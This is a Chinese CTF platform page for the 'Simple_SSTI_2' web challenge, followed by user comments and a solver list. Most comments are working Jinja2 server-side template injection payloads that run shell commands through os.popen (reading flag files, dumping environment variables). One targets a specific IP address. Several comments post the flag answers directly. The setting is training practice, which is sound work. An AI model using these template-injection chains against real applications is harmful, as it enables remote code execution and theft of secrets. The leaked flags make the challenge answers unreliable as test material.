Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 15968
提  示:
描  述:
Simple_SSTI_2
评论
HK1ng 1月前

详解:https://blog.csdn.net/m0_59527104/article/details/147013776

回复 1

smtall 1月前

flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}

回复 0

hao7 5月前

?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}

回复 1

超爱西西鸭 8月前

/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}

回复 1

pettter 9月前

?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}

回复 0

不会写代码的菜鸟 10月前

大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀

回复 1
qingchuan 9月前

因为没有import os,os是未定义的

回复 4

q1152874733 10月前

http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}

回复 0

Royic 11月前

/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}

回复 0

sz007 11月前

flag{6c85015e98aa08e245d15289704dfd8b}

回复 0

如你所愿 11月前

flag{5566f3c3cc3821f4a768384d2a387aae}

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

蟹堡王第一厨师长 攻破了该题 2天前
lunarbyside 攻破了该题 4天前
核能钥匙 攻破了该题 4天前
DOMAKE 攻破了该题 7天前
yht111 攻破了该题 7天前
jie123 攻破了该题 8天前
viphhs 攻破了该题 8天前
玉天问 攻破了该题 9天前
a5580990 攻破了该题 10天前
blii 攻破了该题 10天前
ABCDHBY 攻破了该题 11天前
Miki2 攻破了该题 11天前
llc123 攻破了该题 11天前
1163064874 攻破了该题 12天前
19933663636 攻破了该题 16天前
zyy 攻破了该题 18天前
不上早八 攻破了该题 20天前
qieding 攻破了该题 21天前
JEB_Bem 攻破了该题 21天前
wuqulds 攻破了该题 23天前
问题反馈